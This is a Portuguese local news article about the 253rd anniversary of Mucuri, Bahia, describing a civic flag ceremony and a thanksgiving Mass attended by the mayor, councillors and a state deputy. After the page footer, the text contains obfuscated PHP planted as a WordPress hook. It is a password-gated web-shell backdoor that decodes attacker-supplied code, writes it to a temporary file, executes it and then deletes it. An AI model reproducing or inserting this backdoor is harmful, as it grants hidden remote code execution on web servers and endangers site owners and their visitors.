• SEJA BEM-VINDO

Lideranças políticas participam de ato cívico e missa em ação de graças pelos 253 anos do município de Mucuri

Publicado em: 11/10/2022 Atualizado:: outubro 11, 2022

 

Nesta segunda-feira, 10 de outubro, o município de Mucuri completou 253 anos de emancipação político-administrativa. E para comemorar o marco, a Prefeitura organizou vários eventos alusivos à data. Um desses momentos celebrativos foi realizado pela comunidade católica, que durante a novena em honra à Nossa Senhora Aparecida – padroeira do Brasil – destinou um dia especial de oração pela gestão pública, convidando o prefeito e toda equipe de trabalho para participar deste momento de fé e gratidão.

 

O ato cívico teve início com o hasteamento das bandeiras da Diocese de Teixeira de Freitas/Caravelas, da Bahia, do município de Mucuri e do Brasil, ao som dos hinos Nacional Brasileiro e de Mucuri. Participaram do ato, além do prefeito Roberto Carlos Figueiredo Costa “Robertinho” e o vice-prefeito Vanderlei Rezende, acompanhados por suas famílias, também os secretários e servidores públicos, o presidente da Câmara Municipal, Jocélio Oliveira Brito “Célio Pebas” (PROS) e demais vereadores, além do deputado Estadual Sandro Régis (UB).

 

 

Presidida pelo pároco, padre Raul Felipe, a programação ainda contou com uma missa solene de ação de graças pelo aniversário da cidade. Durante sua fala, o prefeito Robertinho ressaltou os principais avanços que a atual gestão proporcionou para o município, como por exemplo, a iluminação de LED, construção da Unidade de Pronto Atendimento Municipal – UPAM, reforma do Mercado Municipal e das escolas tanto para a Sede quanto em distritos e povoados.

 

 

“Temos obras em todos os cantos, para dar mais dignidade e qualidade de vida ao povo de Mucuri, que ajudou a construir a história desse lugar que encanta. Confio que muito ainda será feito, porque a nossa gestão é focada em cuidar de gente e construir um novo tempo”, comentou o prefeito.

 

O prefeito Robertinho e o chefe de gabinete Robson Carlos Pereira Silva participaram da liturgia proclamada da missa. Ao final, o padre Raul Felipe deu uma benção especial aos servidores públicos e autoridades políticas presentes, agradecendo pelo serviço e trabalho desenvolvido.

 

 

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}